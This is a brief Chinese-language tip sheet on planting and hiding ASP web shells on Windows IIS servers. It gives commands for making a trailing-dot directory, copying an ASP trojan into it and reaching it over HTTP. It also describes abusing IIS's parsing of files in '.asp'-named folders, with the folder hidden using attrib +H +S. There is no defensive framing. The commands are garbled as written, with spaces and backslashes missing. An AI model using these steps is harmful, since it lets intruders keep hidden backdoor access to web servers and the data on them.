1、建立非标准目录：mkdirimages..

拷贝ASP木马至目录：copyc:inetpubwwwrootdbm6.aspc:inetpubwwwrootimages..news.asp

通过web访问ASP木马：http://ip/images../news.asp?action=login

如何删除非标准目录：rmdirimages../s

2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析，以达到我们隐藏自己的网页后门的目的:

mkdirprogramme.asp

新建1.txt文件内容：

新建12.jpg文件内容：或使用GIF与ASP合并后的文件

attrib+H+Sprogramme.asp

通过web访问ASP一句话木马：http://ip/images/programme.asp/1.txt